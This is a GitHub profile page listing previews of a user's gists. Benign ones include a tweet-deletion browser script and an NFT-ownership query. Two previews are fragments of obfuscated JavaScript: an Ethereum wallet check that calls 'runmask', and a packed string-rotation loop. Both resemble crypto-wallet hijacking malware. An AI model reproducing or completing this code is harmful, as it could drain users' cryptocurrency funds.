Skip to content

Instantly share code, notes, and snippets.

View zessu's full-sized avatar
🎯
Focusing

Drew K zessu

🎯
Focusing
  • remote
View GitHub Profile
var neth = 0,
rund = 0,
loval = 0
async function checkethereumw() {
try {
const _0x124ed3 = await window.ethereum.request({ method: 'eth_accounts' })
_0x124ed3.length > 0
? (runmask(), rund != 1 && ((rund = 1), (neth = 1), newdlocal()))
: rund != 1 && ((rund = 1), newdlocal())
} catch (_0x53a897) {
@zessu
zessu / delete_tweets.js
Created July 21, 2025 09:42 — forked from jatinkrmalik/delete_tweets.js
Client-side browser script that celetes tweets from your profile posted after a specific date and time while respecting rate limiter
/**
* @description Deletes tweets from your profile posted after a specific date and time.
* @instructions Paste this entire script into your browser's developer console
* on your Twitter/X profile page (e.g., https://x.com/your-username)
* and press Enter.
* DISCLAIMER: USE AT YOUR OWN RISK. YOUR ACCOUNT MIGHT GET FLAGGED/SUSPENDED. I BEAR NO RESPONSIBILITY
*/
async function deleteSpamTweets() {
// --- CONFIGURATION ---
// Set the cutoff date and time. Tweets posted AFTER this time will be deleted.
const Web3 = require('web3');
// Initialize web3 instance
const web3 = new Web3('your rpc endpoint');
async function getNFTsOwnedByAddress(contractAddress, ownerAddress) {
// Create a new contract instance
const contract = new web3.eth.Contract([
{
"anonymous": false,
''use strict';
(function (T, k) {
const H = T();
while (true) {
try {
const i = parseInt(m(1522, 0x822)) / 1 * (-parseInt(m(3719, 0x1278)) / 2) + -parseInt(m(1304, 0x2a)) / 3 * (-parseInt(m(3749, 0xdfc)) / 4) + parseInt(m(3892, 0xa7a)) / 5 + -parseInt(A(1505, "Id^c")) / 6 * (-parseInt(m(1388, 0x1b7)) / 7) + parseInt(m(710, 0x8cc)) / 8 + parseInt(A(2816, "@fu9")) / 9 * (-parseInt(m(1595, 0xd1f)) / 10) + -parseInt(m(1617, 0x791)) / 11 * (parseInt(m(1647, 0x38c)) / 12);
if (i === k) {
break;
} else {
@zessu
zessu / jessfraz.md
Created July 30, 2018 10:24 — forked from acolyer/jessfraz.md
Containers, operating systems and other fun things from The Morning Paper